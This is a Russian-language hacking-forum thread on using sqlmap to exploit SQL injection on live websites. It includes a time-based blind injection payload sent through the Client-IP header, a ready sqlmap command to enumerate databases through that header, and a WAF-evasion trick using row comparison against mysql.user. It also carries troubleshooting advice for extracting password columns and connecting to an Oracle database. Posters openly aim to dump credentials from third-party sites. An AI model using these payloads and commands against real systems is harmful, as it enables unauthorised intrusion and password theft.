Вопрос: как при помощи sqlmap сделать из запроса SELECT password FROM a.user (Где password фильтруется WAF) запрос вида SELECT 0x70617373776F7264 FROM a.user
"SELECT 0x66 FROM a.user" так не получится, просто заселектиш строку смотря что за запрос, но это в любом случае отдельный скрипт писать придется если знаешь количество колонок в a.user то можно что то около того бинарным перебором сделать Code: mysql> select 'true' from(select 1)x where 'aocalhost'>'localhost'; Empty set (0.00 sec) mysql> select 'true' from(select 1)x where 'qocalhost'>'localhost'; +------+ | true | +------+ | true | +------+ 1 row in set (0.00 sec) на примере mysql.user, первая колонка в этой таблице "Host" Code: mysql> select 'true' from(select 1)x where ('aocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1); Empty set (0.01 sec) mysql> select 'true' from(select 1)x where ('qocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1); +------+ | true | +------+ | true | +------+ 1 row in set (0.01 sec)
Доброго времени суток. Подскажите как правильно "скормить" ссылку в sqlmap. Сканер выдал такие данные: This vulnerability affects /blog/adaptive-learning/. Discovered by: Scripting (Blind_Sql_Injection.script). Attack details HTTP Header input Client-IP was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ И Header вот такой: GET /blog/adaptive-learning/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Client-IP: (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ X-Requested-With: XMLHttpRequest
Code: -u https://site.ru/ --headers="Client-IP: *" --dbms=mysql --random-agent --level=3 --risk=3 --dbs
Ребят помогите, как правильно соединиться с сервером? Что должно быть в new xmpp.Router() ///////////////////////////////////////////////////////////// var xmpp = require('node-xmpp') let s2s = new xmpp.Router() s2s.register('test.servers', function (stanza) { }) //////////////////////////////////////////////////////////// Пишу Так ------------------------------------------- var xmpp = require('node-xmpp') let s2s = new xmpp.Router({ host: 'localhost', port: 5269, }) s2s.register('test.servers', function (stanza) { }) ------------------------------------------- Выдает ------------------------------------------------------------------------ Unhandled rejection TypeError: xmpp.Router is not a constructor ------------------------------------------------------------------------ В чем проблема???
Всем привет. Скажите как через SQLmap напрямую подключиться к БД Oracle.Пакеты необходимые установила... Но вожу команду подключения вида: -d oracle://***Password@IP: PORT/dbname/ Но SQlmap выдает [INFO] testing Oracle [INFO] confirming Oracle [INFO] the back-end DBMS is Oracle back-end DBMS: Oracle Если добавит --dbms то выдает, следующее [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [INFO] fetching current database [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes [[WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes INFO] fetching database (schema) names [INFO] falling back to current database [INFO] fetching current database [CRITICAL] unable to retrieve the database names Что не делаю не так, и возможно ли вообще подключиться в данном случае??
-d oraclel://test:[email protected]:3306/имябазы [CRITICAL] unable to retrieve the database names не может получить имя базы данных Пробуй --no-cast или --hex Другими словами мапа не может понять к чему ей подключатся. То есть тебе надо узнать имя бд для начала
Доброй ночи Несколько вопросов: 1. Выводит колонку password как none, извлекает именно слово none посимвольно, в каждой строке. Как такое может быть? Можно ли что-то сделать? 2. Бывает извлекает пасы как <blank> или еще что-нибудь подобное, hex и nocast не помогает, это какая-то защита стоит я так понимаю, только тамперы подбирать? 3. Глупый вопрос, как определить текущую базу данных. Раскручиваешь скулю, там куча баз данных, бывает допустим sitename, sitenamedb, test_sitename и прочие в куче. Как определить текущую/рабочую? думал это curent-db, но с этой командой он просто извлекает таблицы всех баз подряд. Спасибо за помощь
есть очень годный совет, правда большинство будет кидать камнями когда его услышит. если скуль ставит палки в колеса - бросай велик и крути скуль пешком
вынужден не согласится мой совет не подойдет только при описании конкретного инъекта с определенными проблемами. в данном случае(и похожих) он вполне подходит
охотно верю Code: 1. Выводит колонку password как none, извлекает именно слово none посимвольно, в каждой строке. Как такое может быть? Можно ли что-то сделать? 2. Бывает извлекает пасы как <blank> или еще что-нибудь подобное, hex и nocast не помогает, это какая-то защита стоит я так понимаю, только тамперы подбирать? 3. Глупый вопрос, как определить текущую базу данных. Раскручиваешь скулю, там куча баз данных, бывает допустим sitename, sitenamedb, test_sitename и прочие в куче. Как определить текущую/рабочую? думал это curent-db, но с этой командой он просто извлекает таблицы всех баз подряд. это, извиняюсь, ерунда 1. - то что выводит sqlmap сугубо его дела, признаюсь лезть в многокиловый питоновский код, чтобы ответить на ваш вопрос, у меня желания нет 2. - может быть что угодно, да может быть и waf "какая-то защита стоит я так понимаю". опять же, только ручной анализ поможет определить проблему и решение(если таковое существует) 3. - вот этот вопрос собвственно и сподвиг меня облачить шпагу. как можно не знать как узнать текущую БД ваш нужно сейчас, просто и быстро нужна информация. хм, возможно тут найдутся люди которые помогут, сорь что потратил ваше время